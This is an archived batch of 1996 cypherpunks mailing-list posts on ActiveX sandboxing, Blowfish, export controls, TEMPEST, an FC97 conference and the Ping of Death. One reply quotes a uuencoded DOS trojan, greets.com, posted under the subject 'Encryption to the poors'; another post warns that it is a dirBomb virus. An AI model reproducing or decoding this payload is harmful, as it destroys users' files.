In Ross Anderson's paper `Tamper Resistance - a Cautionary Note' (see
http://www.cl.cam.ac.uk/~rja14/), there is a reference to the clipper
chip having already been reverse engineered:

Anderson writes: "We are reliably informed that at least one
U.S. chipmaker reverse engineered the Clipper chip shortly after its
launch."

Heart warming :-)

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 17 Dec 1996 07:14:06 -0800 (PST)
To: mix-admin@nym.alias.net (lcs Remailer Administrator)
Subject: Re: IMPORTANT: Changes affecting anon.lcs.mit.edu privacy
In-Reply-To: <199612170612.BAA09244@anon.lcs.mit.edu>
Message-ID: <199612171510.KAA13601@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


lcs Remailer Administrator wrote:

| Despite these changes, anon.lcs.mit.edu does not currently and will
| never keep any message-by-message mail logs.  Sendmail currently runs
| at log level 1, which the documentation describes as logging only
| "Serious system failures and potential security problems."

	Oh, so it has a heartbeat logger, telling you its still
running and there are still security problems? ;)


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Tue, 17 Dec 1996 07:20:17 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Securing ActiveX.
Message-ID: <01BBEC03.C251AC10@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


In response to my questioning why one would want to run
an ActiveX control in a sandbox Ray writes:
> To prevent ActiveX controls from formatting your hard drive while still 
> being able to run native code to do fast DES cracking, why else?  
> Sandbox!=Virtual CPU emulator.  Sandboxes work at the supervisor/user CPU 
> level deciding which calls are cool and which will result in a core dump.

I would be happier running an ActiveX control with Peter Trei's signature on it
than I would an unsigned control in a sandbox.  (This kind of a trust decision
is probably the normal case in the intranet world.  ActiveX as it sits is quite
sufficient for rolling out internal intranet applications.)

On the second point, I never suggested that a sandbox would require virtual CPU
emulation.  What I do find likely is that the overhead from the extended types
of checking the kernel would need to do would probably outweight the performance
advantage of native code over a JIT compiler.  The DES cracker is probably not
a good example of the problem because it would make virtually no API calls.

> Viruses can sneak into software.  Given enough time you will see them 
> sneak into compilers which will then happily create virus infected or 
> trojan loaded controls which will be happily signed.  I'll leave the test 
> of that scenario up to your imagination.  There were cases of viruses 
> making their way to production distributed disks back a few years ago 
> because people weren't watching carefully enough.

This is scaremongering.  No, I don't virus scan every new CD I get from
Microsoft/Netscape/etc, do you?  More importantly to the discussion at
hand, what is to prevent said virus from infecting the compiler used to
build the sandbox?  Part of the decision to trust a software vendor must
include trusting that they use appropriate clean build procedures.

> Or you may find that shareware control authors won't bother to sign their
> controls, etc...  Same situation.  At some point trust or no trust, once
> your hard drive is wiped, so is the record of the signature that says "The
> last control you downloaded came from XYZ.com and was written by Vulis." 

If you choose to run an unsigned control all bets are off.  On a related note,
I recently saw a Java implementation of a board game that recommended
the user download the zipped up .classes and run it locally.  How many
average users realize this would disable the Java sandbox entirely?

> > An equivalent Unix problem would be to allow an open-access guest
> > account with the ability to transfer in and execute arbitrary binaries.
> > While doing this securely may be possible in theory I don't think the 
> > state of the art is up to it today.  (I sure wouldn't allow it on my system.)
> 
> Right, so if that's the case, why would you allow ActiveX controls to run 
> on your system?  It's the same problem whether signed or not as 
> signatures only tell you the author's identity and not much else.

You mis-read the paragraph above.  Trying to build the sandbox for native
code as you've described is akin to the problem above.  Is it not?

regards,
-Blake




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 17 Dec 1996 10:45:18 -0800 (PST)
To: Blake Coverett <cypherpunks@toad.com>
Subject: RE: Securing ActiveX.
In-Reply-To: <01BBEC03.C251AC10@bcdev.com>
Message-ID: <v0300780eaedc992551bb@[206.214.103.176]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:19 AM -0800 12/17/96, Blake Coverett wrote:
>I would be happier running an ActiveX control with Peter Trei's signature
>on it
>than I would an unsigned control in a sandbox.  (This kind of a trust decision
>is probably the normal case in the intranet world.  ActiveX as it sits is
>quite
>sufficient for rolling out internal intranet applications.)

While I might agree about Peter, I wouldn't agree if the signature was
Microsoft's (or any other large software vendor).  There is just too much
room for bugs and or Trojan horses to enter via that route.


>On the second point, I never suggested that a sandbox would require
>virtual CPU
>emulation.  What I do find likely is that the overhead from the extended types
>of checking the kernel would need to do would probably outweight the
>performance advantage of native code over a JIT compiler.

Not necessarily true.  See Goldberg, Wagner, Thomas, and Brewer, "A Secure
Environment for Untrusted Helper Applications, Confining the Wily Hacker"
from the 6th USENIX Security Symposium proceedings.  (The paper won the
"best paper" award too.)


>This is scaremongering.  No, I don't virus scan every new CD I get from
>Microsoft/Netscape/etc, do you?

No, but I would prefer to know what their applications are accessing and
why.  That's why current systems are not good from a security prospective.

I would be a great advance in security if *everything* ran in a sandbox.  A
sandbox specially built for it where it had access to the things it
customarily needed and all other access was mediated by the user.  This
kind of environment has its costs, not so much in performance as in
changing the way people work with computers, but it would be a lot more
secure.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 17 Dec 1996 08:49:02 -0800 (PST)
To: dstoler@globalpac.com (dstoler)
Subject: Re: Blowfish Performance
In-Reply-To: <v03007803aedc36589854@[206.170.230.134]>
Message-ID: <9612171648.AA00578@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


dstoler@globalpac.com writes:
>  Encryption and decryption are faster than the fastest DES
>  implementation I've found, but the key expansion (subkey
>  generation) is slow.

If you read the Blowfish design goals in Applied Cryptography you will find  
that it purposely has slow key expansion in order to hamper brute force  
cryptanalysis.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hanson@hss.caltech.edu (Robin Hanson)
Date: Tue, 17 Dec 1996 10:51:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hard to Tax Scenario
In-Reply-To: <v02130503aedc1b273b5c@[10.0.2.15]>
Message-ID: <199612171852.KAA18841@hss.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


Arnold G. Reinhold writes:
>By the way, as a covert MD with a receptionist cover, whom does she date?

Good point.  A big advantage of larger incomes for many people is the
ability to impress other people, like potential dates, with whom they
would like a relationship in the physical world.  

Bill Frantz writes:
>I am not sure we aren't close to that 30% if you include the people who
>receive small portions of their income in cash and fail to report it.

I meant 30% of income, not 30% of people.  

Robin D. Hanson  hanson@hss.caltech.edu  http://hss.caltech.edu/~hanson/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 17 Dec 1996 09:09:12 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Attention Journalists (was Re: TIS_sue)
In-Reply-To: <1.5.4.32.19961217131004.006a82e4@pop.pipeline.com>
Message-ID: <9612171708.AA00591@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>    In a development that may signal the beginning of the end
>    of the long standing encryption export control controversy,
>    TIS today announced that products using very strong
>    cryptography with its RecoverKey technology have been approved
>    for general purpose export control under new export
>    regulations.

For those journalists reading the list that aren't experts in cryptology:  if  
someone outside of your control can recover the key, then it is NOT "very  
strong" cryptography.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 17 Dec 1996 09:14:33 -0800 (PST)
To: Blake Coverett <blake@bcdev.com>
Subject: Re: Securing ActiveX.
In-Reply-To: <01BBEB92.ADD153B0@bcdev.com>
Message-ID: <9612171714.AA00601@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Blake Coverett <blake@bcdev.com> writes
>  No, it's not really the accountability that's the issue.  It's
>  the ability to choose before the fact that I 'trust' the
>  software's author.

No, you have it wrong.  It's the ability to choose before the fact that you  
'trust' the _key_ that signed that applet.  The key is everything and it does  
not necessarily have any connection whatsoever to the software's author.  You  
just hope that it does...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Tue, 17 Dec 1996 08:27:09 -0800 (PST)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: RE: Encryption to the poors
Message-ID: <n1361300421.93570@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


Kinda cool.  Seems like a pretty basic .ASM file, though (I'll have to see how
to implement it tonight).  Couldn't resist; I had to run it.  It converts 
files into directories.  Really outdated.  My guess is its algorithm is to 
start at C:\ and go into each directory from "C:\A*" to "C:D*" and convert
each file into a directory.  Subdirectories are unaffected.  Apparently, this
is an attempt to overwrite you DOS directory.  Too bad I'm running WinNT! :-)
If I'm not mistaken, Win95 would be unaffected, as well.  The only things of
(little) value I lost were in my Borland C base directory.  The file didn't
even modify "C:\"!  

Gee, it's great when you get to run Trojan Horses because you know the
company's IT dept. will clone you a new machine if you mess it up!  ;-)

Anyway.  Now you all know what this does.  BTW, for future reference, does
anyone know of a way to convert the directories back to files?  My guess is
"no"...

One more question.  Not to spread (in)fame...  Anyone know where I can find
Skism?  One mod greets did was create the directory "SKISM.   ".  Name sounds
familiar, but not sure.

PM



----------
From: 	Fuck@yourself.up[SMTP:Fuck@yourself.up]
Sent: 	Monday, December 16, 1996 07.35 PM
To: 	cypherpunks@toad.com
Subject: 	Encryption to the poors

>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Tue, 17 Dec 1996 11:30:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Complete, Unofficial TEMPEST Information Page
Message-ID: <3.0.32.19961217112923.00e9a284@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Everything (well almost everything) you ever wanted to know about TEMPEST
but were afraid to ask.

Research papers, links to TEMPEST hardware manufacturers and consultants,
military security manuals, monitoring devices, history, and more.

http://www.eskimo.com/~joelm

The page is devoted to presenting open-source information about TEMPEST and
related topics.  There is actually quite a large body of unclassified
information available about this subject (much of it on the Net).  My goal
is to provide a useful reference for those interested in emanations
security as it relates to intelligence, computer security, and privacy issues.

Joel McNamara
joelm@eskimo.com

Disclaimer: I've never been involved with the TEMPEST community, had a
security clearance for TEMPEST, or have access to classified material
relating to TEMPEST. Like most good intelligence gathering, the information
on the above-mentioned page is completely derived from publicly available,
unclassified sources.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@Online.Barrons.COM
Date: Tue, 17 Dec 1996 08:45:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Your password for BARRON'S Online
Message-ID: <199612171641.LAA29419@Online.Barrons.COM>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for registering with BARRON'S Online!

THE USER NAME YOU HAVE CHOSEN IS cypherpunks
THE PASSWORD YOU HAVE CHOSEN IS cypherpunks

Please remember that your user name and password are case-sensitive (i.e. Bsmith is different than bsmith) and you should enter them as shown above.

Your user name is required in its exact form each time you want to use registered areas on our site (including the exact upper/lowercase combination). The same restriction applies to your password.

Your user name and password will allow you to access all of the features of BARRON'S Online.

The rest of this message contains information about using your password and user name on BARRON'S Online. You may find it helpful to save this message for future reference.


WHAT HAPPENS NOW?

1. Return to BARRON'S Online (www.barrons.com). You can use your password and user name to log in to any part of the site that requires registration (such as the Table of Contents, this week's stories, Dossiers and Market Day, and so on). The first time you go to one of these parts of BARRON'S Online, you will be prompted to enter your user name and password.

2. If you ever forget your password, or need any registration-related information, just click on the REGISTER button from the BARRON'S Online gateway page to find the help you need.

Welcome to BARRON'S Online... we look forward to seeing you again and again!

BARRON'S Online
Customer Service
barrons-support@www.barrons.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 17 Dec 1996 10:16:40 -0800 (PST)
To: blancw@cnw.com (blanc)
Subject: Re: permanent invasion of privacy
In-Reply-To: <01BBEBA9.4DE87160@king1-12.cnw.com>
Message-ID: <199612171835.MAA02169@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> History could repeat itself.

s/could/should/g

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 17 Dec 1996 09:33:42 -0800 (PST)
To: John Fricker <jfricker@vertexgroup.com>
Subject: RE: Securing ActiveX.
In-Reply-To: <19961217052343287.AAA173@dev.vertexgroup.com>
Message-ID: <Pine.SUN.3.91.961217122924.5536A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Dec 1996, John Fricker wrote:

> Not exactly. Win32 API's include the ability for a program to impersonate any 
> known user. Besides ActiveX (OLE really) has nothing to do with services. 
> 
> In order to make ActiveX secure there would need to be a virtual machine with 
> access to a limitted API only. Sound familiar?

Which is what I've been saying; except for the impersonation feechur, you 
can do all of the above with a secure account.
 
> >If you're using the NTFS file system and give that account access only to 
> >one directory, it can't access anything but that directory.  (If you're 
> >using FAT, this isn't true and the program can read/write/delete anything 
> >it wants.)  Works quite well.
> >
> >It can be done under 95 but Microsoft will have to write a Sandbox 
> >Virtual Machine (a Virtual x86 session whose API's are filtered to 
> >prevent access to certain things like the file system, and disables 
> >direct I/O.)  Not that easy under '95, but it already exists for NT.
> 
> 
> There is no such thing on WinNT.

That's funny, I could have sworn that services could log in as users.  
Gee I must have been dreaming all along about the directory replicator 
which requires you to create a replicator user, and the scheduler service 
which though it can run as the LocalSystem account is better executed as 
another user with limited rights.  No, I must have been imagining them. 
And the services control pannel which allows you to set such settings, 
I've imagined that too. 

Gee I also must have imagined hearing that it's a bad idea to allow such 
services such as the scheduler to log in as administrator or LocalSystem 
account because then folks could run anything they like by using the AT 
command with the /INTERACTIVE switch.

Sure there is no sandbox, however you can easily install the RunAsService 
program from the ResKit and point it at MIE so it too runs as a limited 
access account which won't have access to the rest of your hard drives, 
but granted, if someone does use the Impersonate calls in the control, 
this isn't going to help much.
 
> Why is that a problem? ActiveX components are shipped as discrete objects with 
> a known DLL like interface. DLL's are unloaded when the load counter is zero so 
> they don't hang around in memory after the ActiveX job is done. You also cannot 
> write a "proxy to the file system" in a DLL. That's a special device driver 
> called a filter. Of course there is this Mark Russinovich fellow that is 
> showing how this is not exactly true. It is possible to identify all entry 
> points in a DLL.

Welp, there you go.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 17 Dec 1996 09:46:06 -0800 (PST)
To: fc97-distribution@shipwright.com
Subject: UPDATE: Financial Cryptography 1997 (FC97), Anguilla, BWI
Message-ID: <v03007810aedc8b0f06d5@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


Financial Cryptography 1997 (FC97):
The world's first financial cryptography conference, workshop, and exhibition.

CONFERENCE UPDATE: December 13, 1997
(The Banker's Edition...)

FC97 is sponsored by:

The Journal for Internet Banking and Commerce
<http://www.arraydev.com/commerce/JIBC/>
Offshore Information Services <http://www.offshore.com.ai/>
e$ <http://www.vmeng.com/rah/>

FC97 Conference and Exhibition,
February 24-28, 1997

FC97 Workshop for Senior Managers and IS Professionals
February 17-21, 1997

The Inter-Island Hotel
Anguilla, BWI

Conference Reservations: <http://www.offshore.com.ai./fc97/>



As previously announced, the world's  first peer-reviewed conference on
financial cryptography, FC97, will be held Monday through Friday,
February 24-28, 1997, from 8:30am until 12:30pm, at the Inter-Island
Hotel on the Carribbean island of Anguilla.

In conjunction with the conference, the Inter-Island Hotel will also be
the site of an intensive 40-hour workshop for senior managers and IS
professionals during the week preceding the conference (February 17-21),
and an exhibition for financial cryptography vendors, from 10am-6pm
during the week of the conference itself.

The goals of the combined conference, workshop, and exhibition are:

-- to provide a peer-reviewed forum for important research in financial
cryptography and the effects it will have on society,

-- to give senior managers and IS professionals a solid understanding of
the fundamentals of strong cryptgraphy as applied to financial
operations on public networks, and,

-- to showcase the newest products in financial cryptography.

In addition, plenty of time has been left open in the afternoon and
evening for sponsored corporate functions and activities, for business
networking, and, of course, for recreational activities on Anguilla
itself.

Conference participants are encouraged to bring their families.



The Conference

Ray Hirschfeld, the conference chair, has picked an outstanding group of
professionals and researchers in financial cryptography and in related
fields to review the papers for this conference.

They are:

Chairman: Rafael Hirschfeld, CWI, Amsterdam, The Netherlands

Matthew Franklin, AT&T Laboratories--Research, Murray Hill, NJ, USA
Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
Arjen Lenstra, Citibank, New York, NY, USA
Mark Manasse, Digital Equipment Corporation, Palo Alto, CA, USA
Kevin McCurley, Sandia Laboratories, Albuquerque, NM, USA
Charles Merrill, McCarter & English, Newark, NJ, USA
Clifford Neuman, Information Sciences Institute, Marina del Rey, CA, USA
Sholom Rosen, Citibank, New York, NY, USA
Israel Sendrovic, Federal Reserve Bank of New York, New York, NY, USA

Some of the names may be recognizable to you. If they're not, included
in that list are the inventor of Millicent, the project manager of EU's
CAFE digital cash project, the holders of Citicorp's digital cash
patent, two famous scholars in cryptography and digital commerce law,
the President of International Association for Cryptologic Research, and
the Chairman of the Taskforce on the Security of Electronic Money for
the G-10 Central Banks.

The actual agenda of the conference will be determined by the papers the
program committee selects, so we won't have a final schedule for the
conference until the middle of January. However, the conference
committee is selecting papers in what it considers the union, and not
the intersection, of the fields of finance and cryptography.

The Final Call for Papers was issued a few weeks ago, and the submission
process for papers is now closed. The committee chairman sends his
thanks to all of you who submitted papers for consideration. Given the
volume of submissions, and the quality of the authors, this inaugural
conference should be a very interesting one indeed.

To refresh your memory, the program committee solicited papers in the
following topic areas:

    Anonymous Payments                      Fungibility
    Authentication                          Home Banking
    Communication Security                  Identification
    Conditional Access                      Implementations
    Copyright Protection                    Loss Tolerance
    Credit/Debit Cards                      Loyalty Mechanisms
    Currency Exchange                       Legal Aspects
    Digital Cash                            Micropayments
    Digital Receipts                        Network Payments
    Digital Signatures                      Privacy Issues
    Economic Implications                   Regulatory Issues
    Electronic Funds Transfer               Smart Cards
    Electronic Purses                       Standards
    Electronic Voting                       Tamper Resistance
    Electronic Wallets                      Transferability

Financial Cryptography '97 is held in cooperation with the International
Association for Cryptologic Research. The conference proceedings will be
published on the web by the Journal for Internet Banking and Commerce.
<http://www.arraydev.com/commerce/JIBC/>.

For further information on the submission process, which is, again, now
closed, please see the program committee's web-page at
<http://www.cwi.nl/conferences/FC97>.


As we mentioned before, the conference will be covered by Wired
Magazine, and will be the featured conference in it's January 1997
"Deductible Junkets" section. So, if you have already decided to come to
FC97, please register and make your plane and hotel reservations as
soon as possible. Conference, workshop, and exhibit space is extremely
limited. Wired's January issue comes out near the end of December, and we
expect there to be something of a rush at that time.

The price of a pass to the conference sessions and exhibits is $1,000
U.S. You can pay for your FC97 conference ticket with Visa or MasterCard
at the regstriation site: <http://www.offshore.com.ai/fc97/>

The price includes breakfast at the conference, some stipends for
presenters who need them, and the logistics of having a professional
conference with high-bandwidth internet connectivity in a location like
Anguilla. In looking around, however, the conference organizers *did*
notice that FC97 price is in keeping with other business and
professional technology conferences of similar total session length.

You can register, and pay for, your conference ticket at:

<http://www.offshore.com.ai/fc97/>


The Exhibition

Concurrent with the conference will be the the FC97 Exhibition, a small
trade show for financial cryptography products and services. Each booth
will have high bandwidth access to the internet, and will get 2
conference passes. Booth prices start at $5,000 US. Please contact Julie
Rackliffe at <mailto: rackliffe@tcm.org> for further information . As
space is limited, please register as soon as possible if you plan to be
there.


The Workshop

We are especially honored to have Ian Goldberg as the leader of the FC97
Workshop, which will run one week prior to the conference, February
17-21, 1997.

Ian, the cryptographer at Berkeley who was made famous last year (in
articles in both the Wall Street Journal and the New York Times) for
breaking Netscape's transaction security protocols, will be running an
intensive, 5-day workshop for senior managers and technology
professionals. Someone likened it to a financial cryptography
"boot-camp".

While the workshop is still being developed, and will depend on the
skills of the planned participants, workshop topics will include, but
not be limited to:

Overview and background of cryptography
Survey of existing and proposed Internet payment systems
Details on some specific payment systems
Issues involved in setting up a secure Internet site
A step-by-step walkthrough of setting up an ecash-enabled Web server.

Ian has recruited a strong roster of instructors with credentials
similar to his own, and, as he plans to maintain a 5-1 student/teacher
ratio, the size of the workshop will be restricted and advance
registration will be required.

Further information about the workshop can be found at:

<http://www.cs.berkeley.edu/~iang/fc97/workshop.html>

The planned price for the workshop is $5,000. This covers lab space,
hardware, network access, software, and, of course, 40 hours of
instruction and structured lab activity. The lab itself will be open 24
hours a day, if demand warrants it.

Sponsorship Opportunities

FC97 offers sponsorship opportunities at all levels. Corporations are
encouraged to to be an exclusive sponsor for lunch or dinner, each of
which will be followed by a recreational activity of some kind. Sponsors
will have the opportunity to permanently attach their name to these
networking functions, which the organizers hope will be a large part of
the conference experience. There are 10 such events being planned, and
10 corporations will be accepted for sponsorship. Corporate sponsors of
these events will also get a substantial initial discount on exhibit
space, and complimentary conference tickets.

In-kind sponsorship is also available at all levels of support, with
opportunities for companies to provide networking, bandwidth, hardware,
radio pocket modems and equipment, as well as design and print services,
transportation, and other things. If you've got it and you think we'll
need it, please contact us.

The sponsorship contact is Julie Rackliffe <mailto: rackliffe@tcm.org>.



Air Transportation and Hotels

Air travel to Anguilla is typically done through San Juan, St. Thomas or
St. Maarten/Martin. There are several non-stop flights a day from various
US and European locations. Connection through to Anguilla can be made
through American Eagle, or through LIAT. See your travel agent for details.
American Eagle Airlines has agreed to increase their flights as needed to
accomodate any extra traffic the conference brings to the island.

Anguilla's runway is 3600 feet, with a displaced threshold of 600 feet,
and can accomodate business jets. Obviously, you should talk to your
aviation staff for details about your own aircraft's capabilities in this
regard.

Anguilla import duties are not imposed on hardware or software which
will leave the island again, so, as long as you take it with you when
you leave, you won't pay import duties.

Hotels range from spartan to luxurious, and more information about
hotels on Anquilla can be obtained from your travel agent, or at
<http://www.offshore.com.ai/fc97/>.


Registration for FC97

Again, to register and pay for your ticket to FC97 see:

<http://www.offshore.com.ai/fc97/>

For information the selection of papers for at FC97 see:

<http://www.cwi.nl/conferences/FC97>

If you're interested in Exhibit space, please contact Julie Rackliffe:

<mailto:rackliffe@tcm.org>

If you're interested in sponsoring FC97, also contact Julie Rackliffe:

<mailto:rackliffe@tcm.org>

If you're interested in the FC97 Workshop for Senior Managers and IS
Professionals, see:

<http://www.cs.berkeley.edu/~iang/fc97/workshop.html>


That should be enough for now. Stay tuned for more information on FC97 as
it develops.

See you in Anguilla!

The FC97 Organizing Committee:

Vince Cate and Bob Hettinga, General Chairs
Ray Hirschfeld, Conference Chair
Ian Goldberg, Workshop Chair
Julie Rackliffe, Conference, Exhibit, and Sponsorship Manager

And our sponsors...

The Journal for Internet Banking and Commerce
<http://www.arraydev.com/commerce/JIBC/>
Offshore Information Services <http://www.offshore.com.ai/>
e$ <http://www.vmeng.com/rah/>



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 17 Dec 1996 09:57:26 -0800 (PST)
To: blake@bcdev.com (Blake Coverett)
Subject: Re: Securing ActiveX.
In-Reply-To: <01BBEC03.C251AC10@bcdev.com>
Message-ID: <199612171754.MAA14421@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	Why do people talk about sandboxes?  Sandboxes are places
where people play.  I want to run hostile code in a jail cell, with
carefully designed interfaces where my jailers can control the
messages it sends in and out.

	If this is a game, why is Microsoft spending hundreds of
millions of dollars to put ActiveX everywhere?  People are going to
start building safety critical systems with these toys, and should be
encouraged to engineer them for real world use.

	Crypto relevance?  Java is a pretty damned flexible tool for
writing pluggable cross platform modules, including crypto software.
It behooves us to make it solid.  See
http://www.brokat.de/welcomee.htm (English version) for plugable
crypto.  See Ross Anderson's Murphy's Law paper for why cross platform
is so important.  http://www.cl.cam.ac.uk/users/rja14/

Adam

Blake Coverett wrote:

| I would be happier running an ActiveX control with Peter Trei's
| signature on it than I would an unsigned control in a sandbox.
| (This kind of a trust decision is probably the normal case in the
| intranet world.  ActiveX as it sits is quite sufficient for rolling
| out internal intranet applications.) 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Chislenko <alexc@firefly.net>
Date: Tue, 17 Dec 1996 10:22:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: WARNING: VIRUS: [Was: Re: Encryption to the poors]
Message-ID: <3.0.32.19961217132851.00c9ee90@pop.firefly.net>
MIME-Version: 1.0
Content-Type: text/plain


The last message from Fuck@yourself.up contained a dirBomb
virus as an attachment; file name GREETS.COM

Make sure you don't execute it.  
Maybe, we should execute Fuck@yourself.up instead.



---------------------------------------------------------------------------
Alexander Chislenko <sasha1@netcom.com>     www.lucifer.com/~sasha/home.html
Firefly Network, Inc.: <alexc@firefly.net>  www.ffly.com  617-234-5452
---------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: james@hotwired.com (James Glave)
Date: Tue, 17 Dec 1996 14:40:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ping of Death?
Message-ID: <v02140b03aedcc334a2e2@[204.62.132.92]>
MIME-Version: 1.0
Content-Type: text/plain


Anyone heard of the Ping of Death, aka the Ping Bomb. It's a large chunk of
hostile code, disguised as a mere ping, that can lead to server rebooting.

James Glave

Technology Assignment Editor, Wired News, http://www.wired.com/
Producer, Packet, http://www.packet.com/
Phone: 1.415.276.8455
Fax: 1.415.276.8499






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 17 Dec 1996 15:19:07 -0800 (PST)
To: james@hotwired.com (James Glave)
Subject: Re: Ping of Death?
In-Reply-To: <v02140b03aedcc334a2e2@[204.62.132.92]>
Message-ID: <199612172317.PAA22019@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


James Glave writes:
> 
> Anyone heard of the Ping of Death, aka the Ping Bomb. It's a large chunk of
> hostile code, disguised as a mere ping, that can lead to server rebooting.
> 

It would be quite a trick to get an OS to run code from inside
a ping packet.  Are you sure this isn't the well-known giant ping packet bug?
Receiving one or more of those can cause some hosts to reboot.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 17 Dec 1996 15:36:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Microsoft IE may not work without censorship files
Message-ID: <Pine.GUL.3.95.961217153048.10598A-100000@Networking.Stanford.EDU>
